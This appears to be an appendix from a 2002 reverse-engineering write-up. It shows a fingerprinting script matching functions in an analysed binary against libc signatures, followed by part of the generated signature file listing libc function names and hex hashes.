Searching in databases...

    No match found.

 

Fingerprint for address 0x805c904 [Function_205] is DABBD265

Searching in databases...

    No match found.

 

Fingerprint for address 0x805c944 [Function_206] is B87CA97F

Searching in databases...

    No match found.

 

Fingerprint for address 0x805ca24 [Function_207] is 1B4975C9

Searching in databases...

    No match found.

 

Fingerprint for address 0x805ccb0 [Function_208] is 91D4FFBF

Searching in databases...

    No match found.

 

Fingerprint for address 0x805cdf0 [Function_209] is 1B958055

Searching in databases...

    No match found.

 

Fingerprint for address 0x805ce84 [Function_210] is FD99228C

Searching in databases...

    No match found.

 

Fingerprint for address 0x805d2f4 [Function_211] is 7A663592

Searching in databases...

    No match found.

 

Fingerprint for address 0x805d328 [Function_212] is 1BE95F40

Searching in databases...

    No match found.

 

Fingerprint for address 0x805d3a8 [Function_213] is 662BD313

Searching in databases...

    No match found.

 

Fingerprint for address 0x805d5f8 [Function_214] is 20B3BA59

Searching in databases...

    No match found.

 

Fingerprint for address 0x805d638 [Function_215] is A9B45F00

Searching in databases...

    No match found.

 

Fingerprint for address 0x805d814 [Function_216] is 052D1A84

Searching in databases...

    No match found.

 

Fingerprint for address 0x805dfe0 [Function_217] is 7835A19F

Searching in databases...

    No match found.

 

Fingerprint for address 0x805e110 [Function_218] is 06DDAD48

Searching in databases...

    No match found.

 

Fingerprint for address 0x805e3fc [Function_219] is C13B28AA

Searching in databases...

    No match found.

 

Fingerprint for address 0x805e4cc [Function_220] is EBFE7C1D

Searching in databases...

    No match found.

 

Fingerprint for address 0x805e584 [Function_221] is 49E2A76D

Searching in databases...

    No match found.

 

Fingerprint for address 0x805e640 [Function_222] is D58BBF3B

Searching in databases...

    No match found.

 

Fingerprint for address 0x805e844 [Function_223] is EF59F36B

Searching in databases...

    No match found.

 

Fingerprint for address 0x805e954 [Function_224] is 7CA86695

Searching in databases...

    No match found.

 

Fingerprint for address 0x805e984 [Function_225] is 0430DD5B

Searching in databases...

    No match found.

 

Fingerprint for address 0x805e9b8 [Function_226] is 8AC69732

Searching in databases...

    No match found.

 

Fingerprint for address 0x805eea4 [Function_227] is A7575293

Searching in databases...

    No match found.

 

Fingerprint for address 0x805efb0 [Function_228] is 28A81DB2

Searching in databases...

    No match found.

 

Fingerprint for address 0x805f1dc [Function_229] is 7FF177EB

Searching in databases...

    No match found.

 

Fingerprint for address 0x805f670 [Function_230] is A7C5F021

Searching in databases...

      1 match(es) found:

    fp_query

 

Fingerprint for address 0x805f68c [Function_231] is 01E05EDB

Searching in databases...

    No match found.

 

Fingerprint for address 0x805f730 [Function_232] is A0CB43A2

Searching in databases...

    No match found.

 

Fingerprint for address 0x805f7e4 [Function_233] is F1ABE68D

Searching in databases...

    No match found.

 

Fingerprint for address 0x8060004 [Function_234] is 3B93883C

Searching in databases...

    No match found.

 

Fingerprint for address 0x80605d0 [Function_235] is A4040F60

Searching in databases...

    No match found.

 

Fingerprint for address 0x8060630 [Function_236] is 3028DB04

Searching in databases...

    No match found.

 

Fingerprint for address 0x806077c [Function_237] is 172CE6E6

Searching in databases...

    No match found.

 

Fingerprint for address 0x80608c8 [Function_238] is C2464C6C

Searching in databases...

    No match found.

 

Fingerprint for address 0x8060ae8 [Function_239] is 76976AE6

Searching in databases...

    No match found.

 

Fingerprint for address 0x8060bd8 [Function_240] is 05F278DD

Searching in databases...

    No match found.

 

Fingerprint for address 0x8060d24 [Function_241] is 5DDE16CF

Searching in databases...

    No match found.

 

Fingerprint for address 0x8060d44 [Function_242] is 1A9AB2FD

Searching in databases...

    No match found.

 

Fingerprint for address 0x8060e20 [Function_243] is 79BE3825

Searching in databases...

    No match found.

 

Fingerprint for address 0x8060fa8 [Function_244] is D1E7CA6F

Searching in databases...

    No match found.

 

Fingerprint for address 0x8061210 [Function_245] is 2E8534F6

Searching in databases...

    No match found.

 

Fingerprint for address 0x8061788 [Function_246] is 171A3304

Searching in databases...

    No match found.

 

Fingerprint for address 0x80617c4 [Function_247] is D14AE427

Searching in databases...

    No match found.

 

Fingerprint for address 0x80617e4 [Function_248] is CE3BB52E

Searching in databases...

    No match found.

 

Fingerprint for address 0x806180c [Function_249] is 8ABDC304

Searching in databases...

      1 match(es) found:

    switch_to_main_get_area

 

Fingerprint for address 0x806183c [Function_250] is B8FA5FA0

Searching in databases...

      1 match(es) found:

    switch_to_backup_area

 

Fingerprint for address 0x806186c [Function_251] is 3252A02C

Searching in databases...

    No match found.

 

Fingerprint for address 0x80618d4 [Function_252] is AC602550

Searching in databases...

      1 match(es) found:

    free_backup_area

 

Fingerprint for address 0x8061910 [Function_253] is 955B1848

Searching in databases...

    No match found.

 

Fingerprint for address 0x8061928 [Function_254] is DE985E20

Searching in databases...

    No match found.

 

Fingerprint for address 0x8061a70 [Function_255] is 77BACE64

Searching in databases...

      2 match(es) found:

    uflow underflow

 

Fingerprint for address 0x8061b6c [Function_256] is B9C49610

Searching in databases...

    No match found.

 

Fingerprint for address 0x8061bb8 [Function_257] is F5EC2329

Searching in databases...

    No match found.

 

Fingerprint for address 0x8061c2c [Function_258] is A849AD53

Searching in databases...

    No match found.

 

Fingerprint for address 0x8061d2c [Function_259] is 9CAD905E

Searching in databases...

    No match found.

 

Fingerprint for address 0x8061e44 [Function_260] is BDF1EE5D

Searching in databases...

    No match found.

 

Fingerprint for address 0x8061f34 [Function_261] is 1F614C30

Searching in databases...

    No match found.

 

Fingerprint for address 0x8061fc0 [Function_262] is DAA3AE60

Searching in databases...

    No match found.

 

Fingerprint for address 0x80620c8 [Function_263] is CB206D2B

Searching in databases...

    No match found.

 

Fingerprint for address 0x8062188 [Function_264] is E384EB54

Searching in databases...

    No match found.

 

Fingerprint for address 0x80621d0 [Function_265] is 8F264160

Searching in databases...

    No match found.

 

Fingerprint for address 0x8062204 [Function_266] is D47CF0F1

Searching in databases...

    No match found.

 

Fingerprint for address 0x8062368 [Function_267] is 0AA1F400

Searching in databases...

      1 match(es) found:

    unsave_markers

 

Fingerprint for address 0x80623b8 [Function_268] is 6A302BBB

Searching in databases...

    No match found.

 

Fingerprint for address 0x80624d0 [Function_269] is 74A57077

Searching in databases...

    No match found.

 

Fingerprint for address 0x8062534 [Function_270] is 573BAB62

Searching in databases...

    No match found.

 

Fingerprint for address 0x80625dc [Function_271] is 98B42393

Searching in databases...

    No match found.

 

Fingerprint for address 0x806267c [Function_272] is 84FAD1E5

Searching in databases...

      1 match(es) found:

    seekoff

 

Fingerprint for address 0x80626c8 [Function_273] is AF6B5EBA

Searching in databases...

    No match found.

 

Fingerprint for address 0x8062714 [Function_274] is 6F0B92B5

Searching in databases...

    No match found.

 

Fingerprint for address 0x8062888 [Function_275] is 4BC4782B

Searching in databases...

      1 match(es) found:

    snprintf

 

Fingerprint for address 0x80628a8 [Function_276] is 5B85F0B2

Searching in databases...

    No match found.

 

Fingerprint for address 0x80628f8 [Function_277] is 5259B775

Searching in databases...

    No match found.

 

Fingerprint for address 0x8062940 [Function_278] is F6B92000

Searching in databases...

    No match found.

 

Fingerprint for address 0x8062c9c [Function_279] is E0D238D7

Searching in databases...

    No match found.

 

Fingerprint for address 0x8062cc8 [Function_280] is 74624A3B

Searching in databases...

    No match found.

 

Fingerprint for address 0x8062cf8 [Function_281] is A92410A7

Searching in databases...

    No match found.

 

Fingerprint for address 0x8062d4c [Function_282] is 08D6DF05

Searching in databases...

    No match found.

 

Fingerprint for address 0x806364c [Function_283] is 0798135C

Searching in databases...

      2 match(es) found:

    gsignal raise

 

Fingerprint for address 0x8063664 [Function_284] is 0382EDDB

Searching in databases...

    No match found.

 

Fingerprint for address 0x8063688 [Function_285] is E11BCBDF

Searching in databases...

    No match found.

 

Fingerprint for address 0x8063894 [Function_286] is 092C4216

Searching in databases...

    No match found.

 

Fingerprint for address 0x80638b8 [Function_287] is C6611067

Searching in databases...

    No match found.

 

Fingerprint for address 0x8063958 [Function_288] is E8BB9C9D

Searching in databases...

    No match found.

 

Fingerprint for address 0x8063a74 [Function_289] is C6611067

Searching in databases...

    No match found.

 

Fingerprint for address 0x8063b04 [Function_290] is ACC31831

Searching in databases...

    No match found.

 

Fingerprint for address 0x80641c8 [Function_291] is 8C7640B5

Searching in databases...

    No match found.

 

Fingerprint for address 0x8064400 [Function_292] is 13D81344

Searching in databases...

      1 match(es) found:

    clntudp_create

 

Fingerprint for address 0x80649c0 [Function_293] is 2F086590

Searching in databases...

    No match found.

 

Fingerprint for address 0x80649e0 [Function_294] is 54790C88

Searching in databases...

      1 match(es) found:

    pmap_getport

 

Fingerprint for address 0x8064b1c [Function_295] is 7A0457B0

Searching in databases...

      1 match(es) found:

    xdr_opaque_auth

 

Fingerprint for address 0x8064c48 [Function_296] is 2AF4A336

Searching in databases...

     14 match(es) found:

    xdr_accepted_reply xdr_authdes_cred xdr_authunix_parms xdr_cryptkeyarg xdr_cryptkeyarg2 xdr_cryptkeyres xdr_getcredres xdr_key_netstarg xdr_key_netstres xdr_opaque_auth xdr_pmap xdr_rejected_reply xdr_replymsg xdr_unixcred

 

Fingerprint for address 0x8064c9c [Function_297] is 937FD516

Searching in databases...

      1 match(es) found:

    xdr_callhdr

 

Fingerprint for address 0x8064d14 [Function_298] is 4DF3B83F

Searching in databases...

    No match found.

 

Fingerprint for address 0x8064da0 [Function_299] is 4FC29B38

Searching in databases...

    No match found.

 

Fingerprint for address 0x8064de0 [Function_300] is 9250CDB9

Searching in databases...

    No match found.

 

Fingerprint for address 0x8064e74 [Function_301] is 1B7D7AA6

Searching in databases...

      1 match(es) found:

    xdr_free

 

Fingerprint for address 0x8064ea0 [Function_302] is 67416E4C

Searching in databases...

      5 match(es) found:

    hol_entry_qcmp setmntent xdr_int xdr_longlong_t xdr_u_int

 

Fingerprint for address 0x8064eb4 [Function_303] is 67416E4C

Searching in databases...

      5 match(es) found:

    hol_entry_qcmp setmntent xdr_int xdr_longlong_t xdr_u_int

 

Fingerprint for address 0x8064ec8 [Function_304] is F10AB3BA

Searching in databases...

    No match found.

 

Fingerprint for address 0x8064f10 [Function_305] is 0D74E12B

Searching in databases...

    No match found.

 

Fingerprint for address 0x8064fbc [Function_306] is 9F03A37F

Searching in databases...

    No match found.

 

Fingerprint for address 0x8065098 [Function_307] is F34C4CFA

Searching in databases...

      2 match(es) found:

    xdr_short xdr_u_short

 

Fingerprint for address 0x806510c [Function_308] is 24780A3B

Searching in databases...

    No match found.

 

Fingerprint for address 0x8065120 [Function_309] is 3E801353

Searching in databases...

    No match found.

 

Fingerprint for address 0x80651b8 [Function_310] is E242F89E

Searching in databases...

    No match found.

 

Fingerprint for address 0x806529c [Function_311] is 23A8E9D8

Searching in databases...

      1 match(es) found:

    xdr_union

 

Fingerprint for address 0x8065304 [Function_312] is 89A1B37A

Searching in databases...

    No match found.

 

Fingerprint for address 0x8065408 [Function_313] is CB4144ED

Searching in databases...

    No match found.

 

Fingerprint for address 0x8065588 [Function_314] is 93AD4225

Searching in databases...

    No match found.

 

Fingerprint for address 0x80655f0 [Function_315] is 4C0AD4DD

Searching in databases...

      1 match(es) found:

    fill_input_buf

 

Fingerprint for address 0x8065634 [Function_316] is 077ECC69

Searching in databases...

    No match found.

 

Fingerprint for address 0x8065698 [Function_317] is 0E5C23A2

Searching in databases...

    No match found.

 

Fingerprint for address 0x80656e8 [Function_318] is 7FD74F36

Searching in databases...

    No match found.

 

Fingerprint for address 0x8065734 [Function_319] is B0CF02A0

Searching in databases...

      1 match(es) found:

    fix_buf_size

 

Fingerprint for address 0x8065750 [Function_320] is CD2F801F

Searching in databases...

    No match found.

 

Fingerprint for address 0x8065910 [Function_321] is 2AE969F5

Searching in databases...

    No match found.

 

Fingerprint for address 0x80659ec [Function_322] is 19F79418

Searching in databases...

      1 match(es) found:

    xdrrec_getpos

 

Fingerprint for address 0x8065b2c [Function_323] is 64E11C5A

Searching in databases...

    No match found.

 

Fingerprint for address 0x8065be4 [Function_324] is 57EBF3F7

Searching in databases...

    No match found.

 

Fingerprint for address 0x8065c48 [Function_325] is DE49DF2E

Searching in databases...

    No match found.

 

Fingerprint for address 0x8065c54 [Function_326] is 8A519643

Searching in databases...

    No match found.

 

Fingerprint for address 0x8065c84 [Function_327] is 054B8B45

Searching in databases...

    No match found.

 

Fingerprint for address 0x8065cec [Function_328] is 9BFFD811

Searching in databases...

    No match found.

 

Fingerprint for address 0x8065d50 [Function_329] is 3C33B549

Searching in databases...

    No match found.

 

Fingerprint for address 0x8065d8c [Function_330] is 01D367C9

Searching in databases...

    No match found.

 

Fingerprint for address 0x8065e1c [Function_331] is 1D651E11

Searching in databases...

    No match found.

 

Fingerprint for address 0x80660f4 [Function_332] is 696A42B5

Searching in databases...

    No match found.

 

Fingerprint for address 0x8066124 [Function_333] is 41C566DB

Searching in databases...

    No match found.

 

Fingerprint for address 0x8066154 [Function_334] is 3103283A

Searching in databases...

    No match found.

 

Fingerprint for address 0x8066180 [Function_335] is 8DEC47E7

Searching in databases...

    No match found.

 

Fingerprint for address 0x80661b0 [Function_336] is DC88EC56

Searching in databases...

    No match found.

 

Fingerprint for address 0x80661e8 [Function_337] is B5A1EA26

Searching in databases...

    No match found.

 

Fingerprint for address 0x8066230 [Function_338] is 56C8C313

Searching in databases...

    No match found.

 

Fingerprint for address 0x806626c [Function_339] is AC5AFA8C

Searching in databases...

    No match found.

 

Fingerprint for address 0x80662b0 [Function_340] is 8C70DBBF

Searching in databases...

    No match found.

 

Fingerprint for address 0x8066380 [Function_341] is 618AE777

Searching in databases...

    No match found.

 

Fingerprint for address 0x8066420 [Function_342] is 8A34610C

Searching in databases...

    No match found.

 

Fingerprint for address 0x8066464 [Function_343] is A4E6672B

Searching in databases...

    No match found.

 

Fingerprint for address 0x8066490 [Function_344] is D18C9A99

Searching in databases...

    No match found.

 

Fingerprint for address 0x80664b8 [Function_345] is 592BE8E9

Searching in databases...

    No match found.

 

Fingerprint for address 0x80664e4 [Function_346] is C8C74AE4

Searching in databases...

    No match found.

 

Fingerprint for address 0x80665dc [Function_347] is 2AF4A336

Searching in databases...

     14 match(es) found:

    xdr_accepted_reply xdr_authdes_cred xdr_authunix_parms xdr_cryptkeyarg xdr_cryptkeyarg2 xdr_cryptkeyres xdr_getcredres xdr_key_netstarg xdr_key_netstres xdr_opaque_auth xdr_pmap xdr_rejected_reply xdr_replymsg xdr_unixcred

 

Fingerprint for address 0x80666a0 [Function_348] is 2AF4A336

Searching in databases...

     14 match(es) found:

    xdr_accepted_reply xdr_authdes_cred xdr_authunix_parms xdr_cryptkeyarg xdr_cryptkeyarg2 xdr_cryptkeyres xdr_getcredres xdr_key_netstarg xdr_key_netstres xdr_opaque_auth xdr_pmap xdr_rejected_reply xdr_replymsg xdr_unixcred

 

Fingerprint for address 0x80666e8 [Function_349] is 20211222

Searching in databases...

    No match found.

 

Fingerprint for address 0x8066798 [Function_350] is 5B2EEDA4

Searching in databases...

      1 match(es) found:

    xdr_keystatus

 

Fingerprint for address 0x80667c0 [Function_351] is 16773894

Searching in databases...

    No match found.

 

Fingerprint for address 0x8066a50 [Function_352] is 7F9A5675

Searching in databases...

    No match found.

 

Fingerprint for address 0x8066bfc [Function_353] is 440F7473

Searching in databases...

    No match found.

 

Fingerprint for address 0x8067040 [Function_354] is C96D8E46

Searching in databases...

    No match found.

 

Fingerprint for address 0x8067094 [Function_355] is 852FF55C

Searching in databases...

    No match found.

 

Fingerprint for address 0x80671a4 [Function_356] is 051FB1D6

Searching in databases...

    No match found.

 

Fingerprint for address 0x8067248 [Function_357] is E487C5B3

Searching in databases...

      1 match(es) found:

    xdr_pointer

 

Fingerprint for address 0x80672ac [Function_358] is 5C362736

Searching in databases...

    No match found.

 

Fingerprint for address 0x80672e0 [Function_359] is 9F537EA9

Searching in databases...

    No match found.

 

Fingerprint for address 0x8067300 [Function_360] is FB8A10B7

Searching in databases...

    No match found.

 

Fingerprint for address 0x8067344 [Function_361] is 9037061A

Searching in databases...

    No match found.

 

Fingerprint for address 0x806744c [Function_362] is 2CF88E3A

Searching in databases...

    No match found.

 

Fingerprint for address 0x80675a8 [Function_363] is 72DDE54A

Searching in databases...

    No match found.

 

Fingerprint for address 0x840d21ba [Function_364] is E4094AD2

Searching in databases...

    No match found.

 

./checkf finished at Thu May 23 21:30:46 CEST 2002

Analysis of /root/chroot/reverse/the-binary done.

364 functions analyzed.

41 functions matched.



 


Appendix 12: reverse.dat

 

This is the signature file generated from our libc.a:

 

[?] Exit 8286AD62

[?] MCGetMsg EBFE7C1D

[?] MCGetSet C13B28AA

[?] _mpn_mul_n 52F3076B

[?] _mpn_mul_n_basecase B84B13EE

[?] _mpn_sqr_n EF92B21B

[?] _mpn_sqr_n_basecase 03C9A816

[?] abort A1D4014A

[?] abort F176DED4

[?] abs 2514A984

[?] accept 93D3112B

[?] access D6049D62

[?] acct 45902424

[?] add_derivation A9C99562

[?] add_name_to_object 859B3D88

[?] addmntent B5C814B0

[?] adjtime C6D296B6

[?] adjtimex A5FEB7CD

[?] adjust_column AE2F3CD1

[?] adjust_column F7E56BC4

[?] alarm E43431A9

[?] alias_compare EB9CCE51

[?] alphasort 1B421F9C

[?] alt_match_null_string_p E7931239

[?] arena_get2 2F071A4C

[?] argz_add_sep 7A7C20BB

[?] argz_count 350CA833

[?] argz_create_sep C13691A3

[?] argz_stringify 5A67845A

[?] asctime 3EE03D1C

[?] asctime_r C974FB0E

[?] asprintf F2B20976

[?] assert_fail 630F776D

[?] assert_fail CCFE3612

[?] assert_perror_fail E9B254A8

[?] at_begline_loc_p F39344F0

[?] at_endline_loc_p DBE56B8E

[?] atexit 0C360F61

[?] atexit D8F7AA72

[?] atof 0685CF29

[?] atoi EFCC0E31

[?] atol EFCC0E31

[?] authdes_create 0EC77B57

[?] authdes_getucred 3F254D27

[?] authenticate D2FECDA0

[?] authnone_create A0DFA069

[?] authunix_create 7175D08F

[?] authunix_create_default 7B339FA4

[?] basename 18B32A0A

[?] bcmp E62173A3

[?] bcmp_translate 66233C85

[?] bcopy 0B2E462C

[?] bind 93D3112B

[?] bindresvport 7F9A5675

[?] brk 1D1AB914

[?] brk F62C62F6

[?] bsd_signal 92D18F83

[?] bsearch 6BEA4ADB

[?] bsearch B1CE9F4C

[?] btowc 6D934900

[?] buffered_vfprintf 5C76EB23

[?] bzero AC5AFA8C

[?] calloc 0064DCF9

[?] calloc DABBD265

[?] callrpc EBAC1DDB

[?] canonicalize A5319BA5

[?] canonicalize_file_name 84855122

[?] catclose EB56419D

[?] category_to_name 56DAB81C

[?] catgets 49E2A76D

[?] catopen 06DDAD48

[?] cbc_crypt 095028EB

[?] cfgetispeed A8C131A7

[?] cfgetospeed A8C131A7

[?] cfmakeraw 1E6558E8

[?] cfree 02F6C7D0

[?] cfree 1B06F80E

[?] cfsetispeed A09399E4

[?] cfsetospeed C5677F1B

[?] chdir 20F1D1E3

[?] check_standard_fds 3A29EC14

[?] checkhost 22914E01

[?] chmod 773CF41B

[?] chown F77775A3

[?] chroot 19DB9673

[?] chunk_align 836875A4

[?] chunk_alloc 6B87CBAB

[?] chunk_free C05FB4CC

[?] chunk_realloc 0E098E8E

[?] cleanup B843CB74

[?] cleanup DB804694

[?] clearerr 872D8AE7

[?] clnt_broadcast 1BA65928

[?] clnt_create 26712203

[?] clnt_pcreateerror B7C48FE9

[?] clnt_perrno B7C48FE9

[?] clnt_perror BC4EAB82

[?] clnt_spcreateerror 7FBF90C7

[?] clnt_sperrno EF00F162

[?] clnt_sperror E11BCBDF

[?] clntraw_create B6FA0523

[?] clnttcp_create ACC31831

[?] clntudp_bufcreate 8C7640B5

[?] clntudp_create 13D81344

[?] clock 7AE3A836

[?] close 1C96E7CE

[?] close A9037B65

[?] closedir 603886EA

[?] closedir EE49726A

[?] closelog 2C60A75E

[?] common_op_match_null_string_p 0744B54C

[?] compile_range F25BA075

[?] confstr 02236A5B

[?] connect 93D3112B

[?] creat 816304AD

[?] crypt 4949DA29

[?] ctermid 9F7EF2E9

[?] ctime 0798135C

[?] ctime_r 5E8867CD

[?] ctype_get_mb_cur_max 5D7BF5F3

[?] cuserid 06F60FE8

[?] dcgettext 86DB6E6E

[?] decompose_rpath 5C023F80

[?] default_doallocate A8FC85A5

[?] default_doallocate CE4A9914

[?] default_finish 3A928485

[?] default_finish DAA3AE60

[?] default_imbue 4B8744BF

[?] default_morecore 3595A926

[?] default_morecore 9A585595

[?] default_morecore_init E81750EB

[?] default_pbackfail BDF23016

[?] default_pbackfail CB724C36

[?] default_read 3F8CC042

[?] default_read F253C50F

[?] default_seek 03DA445F

[?] default_seek 3F8CC042

[?] default_seekoff 3F8CC042

[?] default_seekoff 5DAF451C

[?] default_seekpos 37A6848C

[?] default_seekpos 783171C0

[?] default_setbuf 5EAAFC71

[?] default_setbuf BDF1EE5D

[?] default_showmanyc FE83C9A4

[?] default_stat 3F8CC042

[?] default_stat 55280E07

[?] default_sync CE5C99FC

[?] default_sync E55DF312

[?] default_uflow 08B7D537

[?] default_uflow B3A5D02E

[?] default_underflow 36194E3F

[?] default_underflow 3F8CC042

[?] default_write 8B635F48

[?] default_write FA265EFC

[?] default_xsgetn 07B047D0

[?] default_xsgetn 64524291

[?] default_xsputn 37A91C6E

[?] default_xsputn A849AD53

[?] derivation_compare 0AE8D1A8

[?] des_crypt BF726CDA

[?] des_setparity FA9D3C9C

[?] detect_conflict 6D672043

[?] difftime 4DF7BB8C

[?] dirfd 6EFA973C

[?] div F5C1F3F1

[?] dl_cache_libcmp 0C64605E

[?] dl_catch_error 8D5C186A

[?] dl_check_all_versions 884CEB56

[?] dl_check_map_versions 6984F1CA

[?] dl_close 74FABAC9

[?] dl_debug_initialize BA9F447E

[?] dl_debug_message 87AEBB79

[?] dl_debug_state 042AC3E1

[?] dl_dst_count 6967AEE2

[?] dl_dst_substitute C300766B

[?] dl_get_origin 9D353812

[?] dl_important_hwcaps E4BC6762

[?] dl_init_next 61B0895F

[?] dl_init_paths 4E21A3D3

[?] dl_load_cache_lookup 51B5976C

[?] dl_lookup_symbol B0EE2005

[?] dl_lookup_symbol_skip B6DCE082

[?] dl_lookup_versioned_symbol 38001CF4

[?] dl_lookup_versioned_symbol_skip BA5AD411

[?] dl_map_object 9D68C58B

[?] dl_map_object_deps A84F4300

[?] dl_map_object_from_fd 52ABC5E9

[?] dl_mcount 133945DB

[?] dl_mcount_wrapper B1BB058E

[?] dl_mcount_wrapper_check 90A8C15C

[?] dl_new_object 5BF6C04A

[?] dl_open 12534FF6

[?] dl_open_worker 1F664AA4

[?] dl_receive_error 0F1AF600

[?] dl_relocate_object 1E6787C1

[?] dl_runtime_profile 38ABEFE9

[?] dl_runtime_resolve 72BB87C6

[?] dl_setup_hash 1D1A7B7A

[?] dl_signal_cerror D3BCF7D2

[?] dl_signal_error A3319EF7

[?] dl_start F29B9246

[?] dl_start_profile 4113D5DC

[?] dl_sysdep_output A2C33245

[?] dl_sysdep_read_whole_file C741F2C8

[?] dl_unload_cache F8DD0FC5

[?] dn_comp 4F5285E1

[?] dn_expand 22952808

[?] dn_skipname C61CE521

[?] do_global_ctors_aux 95CC3531

[?] do_global_dtors_aux 71A22C71

[?] do_open AF2DC033

[?] do_release_all 48BED54D

[?] do_release_shlib 970A8938

[?] do_write 234642BE

[?] do_write 4BD7AFB0

[?] doallocbuf 3789CA26

[?] doallocbuf F5EC2329

[?] drand48 09BEB926

[?] dup AF646EB0

[?] dup2 B7E96D35

[?] ecb_crypt 6910908F

[?] ecvt D3FB207A

[?] encrypt 37EF1F1C

[?] endgrent 9E68A5AA

[?] endhostent 5F4704BA

[?] endhtent 40D0FAF6

[?] endmntent ACC15584

[?] endnetent 7803FCF8

[?] endnetgrent 2E09E35C

[?] endprotoent 7803FCF8

[?] endpwent ABACFA30

[?] endrpcent 7A524BA9

[?] endservent 7803FCF8

[?] endsgent 9533F958

[?] endspent 9533F958

[?] endusershell 3F7872F8

[?] endutent 6322295B

[?] erand48 661D347D

[?] errno_location B378A217

[?] errno_location DB424743

[?] execl BFA3332C

[?] execle 4ADEF41E

[?] execlp 4ADEF41E

[?] execv 55BF4EEE

[?] execve B0440C36

[?] execvp EB32BD43

[?] exit 8286AD62

[?] exit 84D91FB0

[?] exit DE4678E9

[?] exit F858A627

[?] expand_dynamic_string_token 862F2DF7

[?] extend_alias_table 492FEF37

[?] fchdir 596FEDF5

[?] fchmod D64DEC1A

[?] fchown EFFE063B

[?] fclose 20B55824

[?] fclose E0276F84

[?] fcloseall 67F18345

[?] fcntl 696A42B5

[?] fcntl B20B75E5

[?] fcrypt B49190D8

[?] fcvt 4BB9A762

[?] fdatasync 8727D003

[?] fdopen 041119F8

[?] feof C0A6CE50

[?] ferror C0A6CE50

[?] fflush 3AA62173

[?] fflush 83631159

[?] ffs 6B41462B

[?] ffs CF6544B2

[?] ffsl 6B41462B

[?] fgetc C0A6CE50

[?] fgetgrent 73FED1AF

[?] fgetpos BDB56EE8

[?] fgetpwent 73FED1AF

[?] fgets 2080D969

[?] fgets_unlocked 7B1AFC8A

[?] fgetsgent 54B3A9DB

[?] fgetspent AA99E48A

[?] file_attach 18C65482

[?] file_attach A4A901FA

[?] file_close 010B436C

[?] file_close 76614393

[?] file_close_it 4D841848

[?] file_close_it E05F081A

[?] file_doallocate D64A7C69

[?] file_doallocate F86B4087

[?] file_finish 6E20BCBB

[?] file_finish A10BF372

[?] file_fopen 1F850297

[?] file_fopen A3FE84FD

[?] file_init 4527F6C3

[?] file_init 5DDE16CF

[?] file_open 044FBB03

[?] file_overflow 3B25FD89

[?] file_overflow 42C239B9

[?] file_read 1DABA776

[?] file_read 91210E74

[?] file_seek 4DBF1E22

[?] file_seek 8E321111

[?] file_seekoff 14B3BD22

[?] file_seekoff 5084A6B3

[?] file_setbuf 52F442A4

[?] file_setbuf 6FAAE2E6

[?] file_stat 13483335

[?] file_stat 864EA329

[?] file_sync 2E8534F6

[?] file_sync 56278A25

[?] file_underflow 478E92C2

[?] file_underflow AFB6EC41

[?] file_write 0954B342

[?] file_write CA79069C

[?] file_xsgetn 05CEC84D

[?] file_xsputn 62A3CB28

[?] file_xsputn BCFB0861

[?] fileno C0A6CE50

[?] find_derivation 4D53E896

[?] find_msg 2A0FC9A5

[?] fini D9261C3D

[?] fini_dummy 701BAB5E

[?] fixup DFA8DD6A

[?] flock B75C72CC

[?] flockfile 3457B1A1

[?] flockfile 979F3783

[?] flush_all 2709A10C

[?] flush_all F640A1BB

[?] flush_all_linebuffered 732B9004

[?] flush_all_linebuffered 9768842E

[?] fnmatch 42916B30

[?] fopen 7E082C7A

[?] fopen A4F8A71C

[?] fork BCF79788

[?] fp_nquery DF39A654

[?] fp_query A7C5F021

[?] fp_resstat 6DEAE17E

[?] fpathconf CED11F6B

[?] fprintf 70DCB4D1

[?] fprintf FB112AAC

[?] fputc 4E0452AC

[?] fputs 74A57077

[?] frame_dummy C922BFF8

[?] fread CF479062

[?] free 02F6C7D0

[?] free 1B06F80E

[?] free_atfork B94D59CC

[?] free_backup_area 46033804

[?] free_backup_area AC602550

[?] free_check C23AFED2

[?] free_derivation A1389512

[?] free_modules_db 1311120C

[?] free_starter D770E7D4

[?] freopen 2F5BE4ED

[?] frexp 40C27DA0

[?] fscanf 70DCB4D1

[?] fseek AF6B5EBA

[?] fsetpos 70DCB4D1

[?] fstat E593BEF1

[?] fstatfs 4AF4D8FF

[?] fsync 305A99DC

[?] ftell C0A6CE50

[?] ftime DE12680F

[?] ftok D05B9440

[?] ftruncate 5D7584ED

[?] ftrylockfile 4F9FD79A

[?] ftrylockfile E55DF312

[?] ftw 3A0374D3

[?] funlockfile 5FC622C0

[?] funlockfile 979F3783

[?] fwrite CF479062

[?] fxstat 2CE87F61

[?] fxstat 46FB76A4

[?] fxstat64 71CBE7A1

[?] gconv_alias_compare 15654E94

[?] gconv_close_transform 92BABA27

[?] gconv_find_func FD40368E

[?] gconv_find_shlib E2A93CE9

[?] gconv_find_transform FAF24D3F

[?] gconv_get_builtin_trans 1A2E6EFB

[?] gconv_read_conf 9B9F77AD

[?] gconv_release_shlib BE7B648F

[?] gconv_transform_ascii_internal 643DCA88

[?] gconv_transform_internal_ascii 617159C4

[?] gconv_transform_internal_ucs2 29715A1A

[?] gconv_transform_internal_ucs2little 29715A1A

[?] gconv_transform_internal_ucs4 B69EC3DD

[?] gconv_transform_internal_utf16 20C1B9B2

[?] gconv_transform_internal_utf8 D38EE772

[?] gconv_transform_ucs2_internal 643DCA88

[?] gconv_transform_ucs2little_internal 643DCA88

[?] gconv_transform_utf16_internal 93B9593E

[?] gconv_transform_utf8_internal 05C14A4B

[?] gcvt 671A32FB

[?] gen_steps 860C44C3

[?] gen_tempname 663C280F

[?] generic_getcwd 6482343F

[?] get_column F0A38AEB

[?] get_current_dir_name 67B02845

[?] get_myaddress 181AE509

[?] get_sym AEA41624

[?] getc A6559069

[?] getchar FBD5CB58

[?] getcwd 3192D519

[?] getcwd 5B5E43A6

[?] getdelim 14CD2D06

[?] getdelim 5A9CE97A

[?] getdents 8D636B73

[?] getdents BECB2416

[?] getdirentries 6B434756

[?] getdomainname 9D53895D

[?] getdtablesize 6ED162C6

[?] getegid 41913271

[?] getegid 77A7039C

[?] getenv 6F2A5448

[?] getenv EA6A88CA

[?] geteuid 5527EA2B

[?] geteuid 58CB7837

[?] getfpucw 634CE5CA

[?] getgid 783FF115

[?] getgid A76F7DE5

[?] getgrent 968CC139

[?] getgrgid 2BB5C0BC

[?] getgrnam 084DFB2E

[?] getgroups BADE5BEE

[?] gethostbyaddr 2910ACE6

[?] gethostbyname 8E1B0B58

[?] gethostent 629873FC

[?] gethostid DAA08B4D

[?] gethostname 9D53895D

[?] gethtbyaddr A54E261B

[?] gethtbyname 37E50B6A

[?] gethtent 5D66A400

[?] getitimer F80782E5

[?] getline 06D804C8

